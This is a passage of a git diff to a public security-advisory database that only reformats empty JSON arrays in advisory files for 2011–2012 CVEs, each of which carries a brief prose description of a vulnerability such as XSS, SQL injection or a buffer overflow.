262938aba6a..ba8fd73dd4d 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6pm-r74q-rw7g/GHSA-f6pm-r74q-rw7g.json +++ b/advisories/unreviewed/2022/05/GHSA-f6pm-r74q-rw7g/GHSA-f6pm-r74q-rw7g.json @@ -7,12 +7,8 @@ "CVE-2012-2440" ], "details": "The default configuration of the TP-Link 8840T router enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f7f6-4j5g-969q/GHSA-f7f6-4j5g-969q.json b/advisories/unreviewed/2022/05/GHSA-f7f6-4j5g-969q/GHSA-f7f6-4j5g-969q.json index ed8081610fa..0e0ede99a13 100644 --- a/advisories/unreviewed/2022/05/GHSA-f7f6-4j5g-969q/GHSA-f7f6-4j5g-969q.json +++ b/advisories/unreviewed/2022/05/GHSA-f7f6-4j5g-969q/GHSA-f7f6-4j5g-969q.json @@ -7,12 +7,8 @@ "CVE-2012-3437" ], "details": "The Magick_png_malloc function in coders/png.c in ImageMagick 6.7.8 and earlier does not use the proper variable type for the allocation size, which might allow remote attackers to cause a denial of service (crash) via a crafted PNG file that triggers incorrect memory allocation.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f7r9-rqq9-pvpm/GHSA-f7r9-rqq9-pvpm.json b/advisories/unreviewed/2022/05/GHSA-f7r9-rqq9-pvpm/GHSA-f7r9-rqq9-pvpm.json index 39522490dd6..a2dac87cdc6 100644 --- a/advisories/unreviewed/2022/05/GHSA-f7r9-rqq9-pvpm/GHSA-f7r9-rqq9-pvpm.json +++ b/advisories/unreviewed/2022/05/GHSA-f7r9-rqq9-pvpm/GHSA-f7r9-rqq9-pvpm.json @@ -7,12 +7,8 @@ "CVE-2012-3157" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.0.5, 5.1.0, 5.2.0, 5.3.0 through 5.3.4, 6.0.1, 6.2.0, and 12 allows remote authenticated users to affect integrity, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f8f7-wvqm-7wj3/GHSA-f8f7-wvqm-7wj3.json b/advisories/unreviewed/2022/05/GHSA-f8f7-wvqm-7wj3/GHSA-f8f7-wvqm-7wj3.json index 50ee5d40206..b1039c1e3ff 100644 --- a/advisories/unreviewed/2022/05/GHSA-f8f7-wvqm-7wj3/GHSA-f8f7-wvqm-7wj3.json +++ b/advisories/unreviewed/2022/05/GHSA-f8f7-wvqm-7wj3/GHSA-f8f7-wvqm-7wj3.json @@ -7,12 +7,8 @@ "CVE-2012-3953" ], "details": "SQL injection vulnerability in admin/index.php in phpList before 2.10.19 allows remote administrators to execute arbitrary SQL commands via the delete parameter to the editattributes page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f936-v965-g74r/GHSA-f936-v965-g74r.json b/advisories/unreviewed/2022/05/GHSA-f936-v965-g74r/GHSA-f936-v965-g74r.json index 635db3cb8c8..6c94a44f835 100644 --- a/advisories/unreviewed/2022/05/GHSA-f936-v965-g74r/GHSA-f936-v965-g74r.json +++ b/advisories/unreviewed/2022/05/GHSA-f936-v965-g74r/GHSA-f936-v965-g74r.json @@ -7,12 +7,8 @@ "CVE-2012-2145" ], "details": "Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f9jx-2g6h-pw23/GHSA-f9jx-2g6h-pw23.json b/advisories/unreviewed/2022/05/GHSA-f9jx-2g6h-pw23/GHSA-f9jx-2g6h-pw23.json index 1b73a6132fd..ada415993d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-f9jx-2g6h-pw23/GHSA-f9jx-2g6h-pw23.json +++ b/advisories/unreviewed/2022/05/GHSA-f9jx-2g6h-pw23/GHSA-f9jx-2g6h-pw23.json @@ -7,12 +7,8 @@ "CVE-2012-3449" ], "details": "Open vSwitch 1.4.2 uses world writable permissions for (1) /var/lib/openvswitch/pki/controllerca/incoming/ and (2) /var/lib/openvswitch/pki/switchca/incoming/, which allows local users to delete and overwrite arbitrary files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f9pm-2gc4-v2g5/GHSA-f9pm-2gc4-v2g5.json b/advisories/unreviewed/2022/05/GHSA-f9pm-2gc4-v2g5/GHSA-f9pm-2gc4-v2g5.json index 019126f2c24..54fdebbfef6 100644 --- a/advisories/unreviewed/2022/05/GHSA-f9pm-2gc4-v2g5/GHSA-f9pm-2gc4-v2g5.json +++ b/advisories/unreviewed/2022/05/GHSA-f9pm-2gc4-v2g5/GHSA-f9pm-2gc4-v2g5.json @@ -7,12 +7,8 @@ "CVE-2012-3713" ], "details": "Apple Safari before 6.0.1 does not properly handle the Quarantine attribute of HTML documents, which allows user-assisted remote attackers to read arbitrary files by leveraging the presence of a downloaded document.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f9qw-7g88-jf6j/GHSA-f9qw-7g88-jf6j.json b/advisories/unreviewed/2022/05/GHSA-f9qw-7g88-jf6j/GHSA-f9qw-7g88-jf6j.json index b8da0a6eb9a..cc352a0e028 100644 --- a/advisories/unreviewed/2022/05/GHSA-f9qw-7g88-jf6j/GHSA-f9qw-7g88-jf6j.json +++ b/advisories/unreviewed/2022/05/GHSA-f9qw-7g88-jf6j/GHSA-f9qw-7g88-jf6j.json @@ -7,12 +7,8 @@ "CVE-2012-1073" ], "details": "Cross-site scripting (XSS) vulnerability in the Category-System (toi_category) extension 0.6.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fc26-c437-49h2/GHSA-fc26-c437-49h2.json b/advisories/unreviewed/2022/05/GHSA-fc26-c437-49h2/GHSA-fc26-c437-49h2.json index 65f4a52c2af..b2399f26647 100644 --- a/advisories/unreviewed/2022/05/GHSA-fc26-c437-49h2/GHSA-fc26-c437-49h2.json +++ b/advisories/unreviewed/2022/05/GHSA-fc26-c437-49h2/GHSA-fc26-c437-49h2.json @@ -7,12 +7,8 @@ "CVE-2012-0978" ], "details": "Stack-based buffer overflow in npjp2.dll in LuraWave JP2 Browser Plug-In 1.1.1.11 and other versions before 2.1.1.11 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fcgq-p3x8-962w/GHSA-fcgq-p3x8-962w.json b/advisories/unreviewed/2022/05/GHSA-fcgq-p3x8-962w/GHSA-fcgq-p3x8-962w.json index be3f95d50a9..6b9b709a0d5 100644 --- a/advisories/unreviewed/2022/05/GHSA-fcgq-p3x8-962w/GHSA-fcgq-p3x8-962w.json +++ b/advisories/unreviewed/2022/05/GHSA-fcgq-p3x8-962w/GHSA-fcgq-p3x8-962w.json @@ -7,12 +7,8 @@ "CVE-2012-0859" ], "details": "The render_line function in the vorbis codec (vorbis.c) in libavcodec in FFmpeg before 0.9.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted Vorbis file, related to a large multiplier. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3893.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ff8p-rgjc-8cmx/GHSA-ff8p-rgjc-8cmx.json b/advisories/unreviewed/2022/05/GHSA-ff8p-rgjc-8cmx/GHSA-ff8p-rgjc-8cmx.json index d2e76e37ff9..a415c9fd70a 100644 --- a/advisories/unreviewed/2022/05/GHSA-ff8p-rgjc-8cmx/GHSA-ff8p-rgjc-8cmx.json +++ b/advisories/unreviewed/2022/05/GHSA-ff8p-rgjc-8cmx/GHSA-ff8p-rgjc-8cmx.json @@ -7,12 +7,8 @@ "CVE-2012-1055" ], "details": "Heap-based buffer overflow in PhotoLine 17.01 and possibly other versions before 17.02 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ffjv-cr82-26g3/GHSA-ffjv-cr82-26g3.json b/advisories/unreviewed/2022/05/GHSA-ffjv-cr82-26g3/GHSA-ffjv-cr82-26g3.json index b005cd58e5f..70cac1fb6ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffjv-cr82-26g3/GHSA-ffjv-cr82-26g3.json +++ b/advisories/unreviewed/2022/05/GHSA-ffjv-cr82-26g3/GHSA-ffjv-cr82-26g3.json @@ -7,12 +7,8 @@ "CVE-2012-3815" ], "details": "Buffer overflow in RunTime.exe in Sielco Sistemi Winlog Pro SCADA before 2.07.18 and Winlog Lite SCADA before 2.07.18 allows remote attackers to execute arbitrary code via a crafted packet to TCP port 46824. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ffp9-mjw3-xqfh/GHSA-ffp9-mjw3-xqfh.json b/advisories/unreviewed/2022/05/GHSA-ffp9-mjw3-xqfh/GHSA-ffp9-mjw3-xqfh.json index aacce23b1e9..b5a9e132f08 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffp9-mjw3-xqfh/GHSA-ffp9-mjw3-xqfh.json +++ b/advisories/unreviewed/2022/05/GHSA-ffp9-mjw3-xqfh/GHSA-ffp9-mjw3-xqfh.json @@ -7,12 +7,8 @@ "CVE-2012-3225" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.3.0 through 5.3.4 allows remote authenticated users to affect confidentiality and integrity, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fg4p-q327-mj7c/GHSA-fg4p-q327-mj7c.json b/advisories/unreviewed/2022/05/GHSA-fg4p-q327-mj7c/GHSA-fg4p-q327-mj7c.json index 95e3e29bdbe..08398cce5f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-fg4p-q327-mj7c/GHSA-fg4p-q327-mj7c.json +++ b/advisories/unreviewed/2022/05/GHSA-fg4p-q327-mj7c/GHSA-fg4p-q327-mj7c.json @@ -7,12 +7,8 @@ "CVE-2011-5278" ], "details": "SQL injection vulnerability in signature.php in Advanced Forum Signatures plugin (aka afsignatures) 2.0.4 for MyBB allows remote attackers to execute arbitrary SQL commands via the afs_bar_right parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fg82-4jmc-96qq/GHSA-fg82-4jmc-96qq.json b/advisories/unreviewed/2022/05/GHSA-fg82-4jmc-96qq/GHSA-fg82-4jmc-96qq.json index 910258331df..8a46ea10bdd 100644 --- a/advisories/unreviewed/2022/05/GHSA-fg82-4jmc-96qq/GHSA-fg82-4jmc-96qq.json +++ b/advisories/unreviewed/2022/05/GHSA-fg82-4jmc-96qq/GHSA-fg82-4jmc-96qq.json @@ -7,12 +7,8 @@ "CVE-2012-2181" ], "details": "Directory traversal vulnerability in the Dojo module in IBM WebSphere Portal 7.0.0.1 and 7.0.0.2 before CF14, and 8.0, allows remote attackers to read arbitrary files via a crafted URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fh7p-4pc7-4w39/GHSA-fh7p-4pc7-4w39.json b/advisories/unreviewed/2022/05/GHSA-fh7p-4pc7-4w39/GHSA-fh7p-4pc7-4w39.json index d5f62e71b5b..fa926ada0d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-fh7p-4pc7-4w39/GHSA-fh7p-4pc7-4w39.json +++ b/advisories/unreviewed/2022/05/GHSA-fh7p-4pc7-4w39/GHSA-fh7p-4pc7-4w39.json @@ -7,12 +7,8 @@ "CVE-2012-1215" ], "details": "Cross-site scripting (XSS) vulnerability in the Add friends module in the Yoono extension before 7.7.8 for Firefox allows remote attackers to inject arbitrary web script or HTML via the create field in a \"Create a group\" action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fh9c-mjc9-6gqq/GHSA-fh9c-mjc9-6gqq.json b/advisories/unreviewed/2022/05/GHSA-fh9c-mjc9-6gqq/GHSA-fh9c-mjc9-6gqq.json index f33cd761780..9de7632baff 100644 --- a/advisories/unreviewed/2022/05/GHSA-fh9c-mjc9-6gqq/GHSA-fh9c-mjc9-6gqq.json +++ b/advisories/unreviewed/2022/05/GHSA-fh9c-mjc9-6gqq/GHSA-fh9c-mjc9-6gqq.json @@ -7,12 +7,8 @@ "CVE-2012-0720" ], "details": "Cross-site scripting (XSS) vulnerability in the Integration Solution Console in the Administration Console in IBM WebSphere Application Server 7.0 before 7.0.0.23 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fj42-c8v2-24mg/GHSA-fj42-c8v2-24mg.json b/advisories/unreviewed/2022/05/GHSA-fj42-c8v2-24mg/GHSA-fj42-c8v2-24mg.json index de28df4478d..184b887c249 100644 --- a/advisories/unreviewed/2022/05/GHSA-fj42-c8v2-24mg/GHSA-fj42-c8v2-24mg.json +++ b/advisories/unreviewed/2022/05/GHSA-fj42-c8v2-24mg/GHSA-fj42-c8v2-24mg.json @@ -7,12 +7,8 @@ "CVE-2012-3128" ], "details": "Unspecified vulnerability in Oracle SPARC T-Series Servers running System Firmware 8.2.0 and 8.1.4.e or earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Integrated Lights Out Manager.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fj4m-gh57-2vjv/GHSA-fj4m-gh57-2vjv.json b/advisories/unreviewed/2022/05/GHSA-fj4m-gh57-2vjv/GHSA-fj4m-gh57-2vjv.json index 0160481647c..524ba790108 100644 --- a/advisories/unreviewed/2022/05/GHSA-fj4m-gh57-2vjv/GHSA-fj4m-gh57-2vjv.json +++ b/advisories/unreviewed/2022/05/GHSA-fj4m-gh57-2vjv/GHSA-fj4m-gh57-2vjv.json @@ -7,12 +7,8 @@ "CVE-2012-3399" ], "details": "Config/diff.php in Basilic 1.5.14 allows remote attackers to execute arbitrary commands via shell metacharacters in the file parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fm9x-22rp-jv6p/GHSA-fm9x-22rp-jv6p.json b/advisories/unreviewed/2022/05/GHSA-fm9x-22rp-jv6p/GHSA-fm9x-22rp-jv6p.json index 98a0bc9f5b3..886ab927daf 100644 --- a/advisories/unreviewed/2022/05/GHSA-fm9x-22rp-jv6p/GHSA-fm9x-22rp-jv6p.json +++ b/advisories/unreviewed/2022/05/GHSA-fm9x-22rp-jv6p/GHSA-fm9x-22rp-jv6p.json @@ -7,12 +7,8 @@ "CVE-2012-2099" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Wikidforum 2.10 allow remote attackers to inject arbitrary web script or HTML via the (1) search field, or the (2) Author or (3) select_sort parameters in an advanced search.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fmw4-6c7m-vcmc/GHSA-fmw4-6c7m-vcmc.json b/advisories/unreviewed/2022/05/GHSA-fmw4-6c7m-vcmc/GHSA-fmw4-6c7m-vcmc.json index 2f1b1b7207e..b053200213f 100644 --- a/advisories/unreviewed/2022/05/GHSA-fmw4-6c7m-vcmc/GHSA-fmw4-6c7m-vcmc.json +++ b/advisories/unreviewed/2022/05/GHSA-fmw4-6c7m-vcmc/GHSA-fmw4-6c7m-vcmc.json @@ -7,12 +7,8 @@ "CVE-2012-0905" ], "details": "SQL injection vulnerability in deV!L'z Clanportal (DZCP) Gamebase addon allows remote attackers to execute arbitrary SQL commands via the gameid parameter in a detail action to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fp5w-43v8-pm5w/GHSA-fp5w-43v8-pm5w.json b/advisories/unreviewed/2022/05/GHSA-fp5w-43v8-pm5w/GHSA-fp5w-43v8-pm5w.json index d8b8e0bd49c..8c354409b3e 100644 --- a/advisories/unreviewed/2022/05/GHSA-fp5w-43v8-pm5w/GHSA-fp5w-43v8-pm5w.json +++ b/advisories/unreviewed/2022/05/GHSA-fp5w-43v8-pm5w/GHSA-fp5w-43v8-pm5w.json @@ -7,12 +7,8 @@ "CVE-2012-2941" ], "details": "Cross-site scripting (XSS) vulnerability in search/ in Yandex.Server 2010 9.0 Enterprise allows remote attackers to inject arbitrary web script or HTML via the text parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fpfq-2jvw-r57h/GHSA-fpfq-2jvw-r57h.json b/advisories/unreviewed/2022/05/GHSA-fpfq-2jvw-r57h/GHSA-fpfq-2jvw-r57h.json index 788dfdbe4bc..57d17bf945c 100644 --- a/advisories/unreviewed/2022/05/GHSA-fpfq-2jvw-r57h/GHSA-fpfq-2jvw-r57h.json +++ b/advisories/unreviewed/2022/05/GHSA-fpfq-2jvw-r57h/GHSA-fpfq-2jvw-r57h.json @@ -7,12 +7,8 @@ "CVE-2012-0705" ], "details": "InfoSphere Import Export Manager in InfoSphere Information Server MetaBrokers & Bridges (MBB) in IBM InfoSphere Information Server 8.1, 8.5 before FP3, 8.7, and 9.1 does not validate unspecified input data, which allows remote authenticated users to execute arbitrary commands via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fpjr-8xmq-6c4g/GHSA-fpjr-8xmq-6c4g.json b/advisories/unreviewed/2022/05/GHSA-fpjr-8xmq-6c4g/GHSA-fpjr-8xmq-6c4g.json index 2d863af5a67..b96a74654d9 100644 --- a/advisories/unreviewed/2022/05/GHSA-fpjr-8xmq-6c4g/GHSA-fpjr-8xmq-6c4g.json +++ b/advisories/unreviewed/2022/05/GHSA-fpjr-8xmq-6c4g/GHSA-fpjr-8xmq-6c4g.json @@ -7,12 +7,8 @@ "CVE-2012-3562" ], "details": "Opera before 12.00 Beta allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page that is not properly handled during a reload, as demonstrated by a \"multiple origin camera test\" page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fpjv-7xrc-6c45/GHSA-fpjv-7xrc-6c45.json b/advisories/unreviewed/2022/05/GHSA-fpjv-7xrc-6c45/GHSA-fpjv-7xrc-6c45.json index 9ed44b3f4da..beb9b05211d 100644 --- a/advisories/unreviewed/2022/05/GHSA-fpjv-7xrc-6c45/GHSA-fpjv-7xrc-6c45.json +++ b/advisories/unreviewed/2022/05/GHSA-fpjv-7xrc-6c45/GHSA-fpjv-7xrc-6c45.json @@ -7,12 +7,8 @@ "CVE-2012-1581" ], "details": "MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 uses weak random numbers for password reset tokens, which makes it easier for remote attackers to change the passwords of arbitrary users.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fq7r-m8m3-5v75/GHSA-fq7r-m8m3-5v75.json b/advisories/unreviewed/2022/05/GHSA-fq7r-m8m3-5v75/GHSA-fq7r-m8m3-5v75.json index cd6e9544715..ccd9d196f17 100644 --- a/advisories/unreviewed/2022/05/GHSA-fq7r-m8m3-5v75/GHSA-fq7r-m8m3-5v75.json +++ b/advisories/unreviewed/2022/05/GHSA-fq7r-m8m3-5v75/GHSA-fq7r-m8m3-5v75.json @@ -7,12 +7,8 @@ "CVE-2012-2071" ], "details": "Cross-site scripting (XSS) vulnerability in the Contact Forms module 6.x-1.x before 6.x-1.13 for Drupal when the core contact form is enabled, allows remote authenticated users with the administer site-wide contact form permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fr74-c8w3-jj9x/GHSA-fr74-c8w3-jj9x.json b/advisories/unreviewed/2022/05/GHSA-fr74-c8w3-jj9x/GHSA-fr74-c8w3-jj9x.json index 41b761b3fec..6cb0e309ccc 100644 --- a/advisories/unreviewed/2022/05/GHSA-fr74-c8w3-jj9x/GHSA-fr74-c8w3-jj9x.json +++ b/advisories/unreviewed/2022/05/GHSA-fr74-c8w3-jj9x/GHSA-fr74-c8w3-jj9x.json @@ -7,12 +7,8 @@ "CVE-2012-1049" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ADManager Plus 5.2 Build 5210 allow remote attackers to inject arbitrary web script or HTML via the (1) domainName parameter to jsp/AddDC.jsp or (2) operation parameter to DomainConfig.do.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-frh7-v9hr-974w/GHSA-frh7-v9hr-974w.json b/advisories/unreviewed/2022/05/GHSA-frh7-v9hr-974w/GHSA-frh7-v9hr-974w.json index b2228a5ccaf..6c95e0017d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-frh7-v9hr-974w/GHSA-frh7-v9hr-974w.json +++ b/advisories/unreviewed/2022/05/GHSA-frh7-v9hr-974w/GHSA-frh7-v9hr-974w.json @@ -7,12 +7,8 @@ "CVE-2011-5170" ], "details": "Stack-based buffer overflow in Castillo Bueno Systems CCMPlayer 1.5 allows remote attackers to execute arbitrary code via a long track name in an m3u playlist.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-frmw-wwv7-8q6q/GHSA-frmw-wwv7-8q6q.json b/advisories/unreviewed/2022/05/GHSA-frmw-wwv7-8q6q/GHSA-frmw-wwv7-8q6q.json index 2702b6ca9ce..4e17e312860 100644 --- a/advisories/unreviewed/2022/05/GHSA-frmw-wwv7-8q6q/GHSA-frmw-wwv7-8q6q.json +++ b/advisories/unreviewed/2022/05/GHSA-frmw-wwv7-8q6q/GHSA-frmw-wwv7-8q6q.json @@ -7,12 +7,8 @@ "CVE-2012-2321" ], "details": "The loopback plug-in in ConnMan before 0.85 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) host name or (2) domain name in a DHCP reply.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-frv6-mjpx-v245/GHSA-frv6-mjpx-v245.json b/advisories/unreviewed/2022/05/GHSA-frv6-mjpx-v245/GHSA-frv6-mjpx-v245.json index 074f0f73edb..c4629440887 100644 --- a/advisories/unreviewed/2022/05/GHSA-frv6-mjpx-v245/GHSA-frv6-mjpx-v245.json +++ b/advisories/unreviewed/2022/05/GHSA-frv6-mjpx-v245/GHSA-frv6-mjpx-v245.json @@ -7,12 +7,8 @@ "CVE-2012-2408" ], "details": "The AAC SDK in RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through 1.1.5, and Mac RealPlayer before 12.0.1.1750 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact via a crafted AAC file that is not properly handled during decoding.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fvmw-m7v4-pmmq/GHSA-fvmw-m7v4-pmmq.json b/advisories/unreviewed/2022/05/GHSA-fvmw-m7v4-pmmq/GHSA-fvmw-m7v4-pmmq.json index 083e229f085..0aa5ad5ca99 100644 --- a/advisories/unreviewed/2022/05/GHSA-fvmw-m7v4-pmmq/GHSA-fvmw-m7v4-pmmq.json +++ b/advisories/unreviewed/2022/05/GHSA-fvmw-m7v4-pmmq/GHSA-fvmw-m7v4-pmmq.json @@ -7,12 +7,8 @@ "CVE-2012-0908" ], "details": "Cross-site scripting (XSS) vulnerability in logout.php in SimpleSAMLphp 1.8.1 and possibly other versions before 1.8.2 allows remote attackers to inject arbitrary web script or HTML via the link_href parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fvp2-vcfp-4p33/GHSA-fvp2-vcfp-4p33.json b/advisories/unreviewed/2022/05/GHSA-fvp2-vcfp-4p33/GHSA-fvp2-vcfp-4p33.json index 0b23b92336a..6f5f25b5673 100644 --- a/advisories/unreviewed/2022/05/GHSA-fvp2-vcfp-4p33/GHSA-fvp2-vcfp-4p33.json +++ b/advisories/unreviewed/2022/05/GHSA-fvp2-vcfp-4p33/GHSA-fvp2-vcfp-4p33.json @@ -7,12 +7,8 @@ "CVE-2012-0737" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fwg7-925x-49rf/GHSA-fwg7-925x-49rf.json b/advisories/unreviewed/2022/05/GHSA-fwg7-925x-49rf/GHSA-fwg7-925x-49rf.json index 6cf01d64907..18aa416442e 100644 --- a/advisories/unreviewed/2022/05/GHSA-fwg7-925x-49rf/GHSA-fwg7-925x-49rf.json +++ b/advisories/unreviewed/2022/05/GHSA-fwg7-925x-49rf/GHSA-fwg7-925x-49rf.json @@ -7,12 +7,8 @@ "CVE-2012-3923" ], "details": "The SSLVPN implementation in Cisco IOS 12.4, 15.0, 15.1, and 15.2, when DTLS is not enabled, does not properly handle certain outbound ACL configurations, which allows remote authenticated users to cause a denial of service (device crash) via a session involving a PPP over ATM (PPPoA) interface, aka Bug ID CSCte41827.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git 